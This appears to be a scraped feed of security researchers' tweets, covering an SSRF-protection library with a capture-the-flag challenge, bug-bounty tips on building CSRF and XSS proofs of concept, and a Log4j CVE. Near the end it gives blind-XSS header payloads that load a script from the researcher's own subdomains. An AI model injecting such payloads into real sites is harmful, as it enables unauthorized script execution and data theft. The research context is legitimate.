smnf

We're definitely not your typical AppSec consultancy! youtube.com/watch?v=fFOiS5… doyensec.com/careers.html #infosecjobs #doyensec #appsec #career #notyourtypicalappsec Credit: @pmontesel

Announcing the release of `safeurl` - a library to help #golang devs "Build with Security"! This module provides tested & versatile protection against Server Side Request Forgery (SSRF)! Hurry and check it out! #doyensec #AppSec blog.doyensec.com/2022/12/13/saf… github.com/doyensec/safeu…

Help make safeurl even better (and safer). If you're the kind of person who can't wait to try to break a new library - connect to http://164.92.85.153/ and attempt to catch the flag on this internal (and unauthorized) URL: http://164.92.85.153/flag! You might win a cool prize :)

Learn a little about the Apache JServe Protocol (AJP) as well as how to interact with and fuzz it, in our latest research blog post from @ouadmoha . #appsec #doyensec #Apache #Security blog.doyensec.com/2022/11/15/lea…

Happy Friday! Any weekend (appsec) plans? No Hat 22 talks are all at youtube.com/playlist?list=… Watch @lucacarettoni's best bugs show 📺🪲 (Web Security in 2022) youtube.com/watch?v=M2OwLX… #nohat2022

Best meme 👉 wins swag! Hacking memes only 🚨 Keep them original 🖌️ Drop 'em below ⤵️

@gregxsunday Also in Burp you can right click on request -> Engagement tools -> generate CSRF PoC -> Options -> Cross-domain XHR -> Regenerate, and you should have JS code ready

Creating an XSS exploit? You don't need to google "how to make a request in JS?" for the thousandth time. Go to dev tools, right-click the request you want to reproduce and "Copy as fetch"

@gregxsunday @Yassineaboukir Also did this :D

@Yassineaboukir maybe this will do😂

Anyone has an idea of what can an attacker do by controlling the src value of an img tag apart from exploiting GET-based CSRF?

Yeah it’s the parody account’s fault that my employment is affected. Not my bat shit crazy claims, threats and attacks on researchers. Why wouldn’t a company want their brand associated with me? Yes I am a shape shifter. If a fraud can keep changing his name why can’t I?

@phwd_ Mind sharing a link? Also, did they sent the invites yet?

It would be nice if meta updated everyone about the date change for Spain. I had to find out it changed to April from searching on Twitter. Thanks 🙏🏽

@phwd_ What TURN methods you've tried here?

Here is an old video when I was chasing a Facebook SSRF by reading a HackerOne report and RFCs.

@phwd_ Still waiting

Also, did anyone receive an email from meta about Madrid yet?

@cyb3rops Fun fact, there is already scripting feature in log4j config file. Time to report it to them and get a CVE😎 #Scripts" target="_blank" rel="nofollow noopener">logging.apache.org/log4j/2.x/manu…

Log4j 2.17 RCE CVE-2021-44832 in a nutshell

@manisashankm @ADITYASHENDE17 and then you would check DNS logs to see which domain was actually accessed. That could also show you what domain was searched, but XSS payload did not fire, indicating place to take a look into (2/2)

@manisashankm @ADITYASHENDE17 I guess if you host XSS hunter on your own server, you could connect different local subdomains to different headers. For example: "Header1: <script src=header1.mydomain.com/xsshunter.js></script>" "Header2: <script src=header2.mydomain.com/xsshunter.js></script>" (1/2)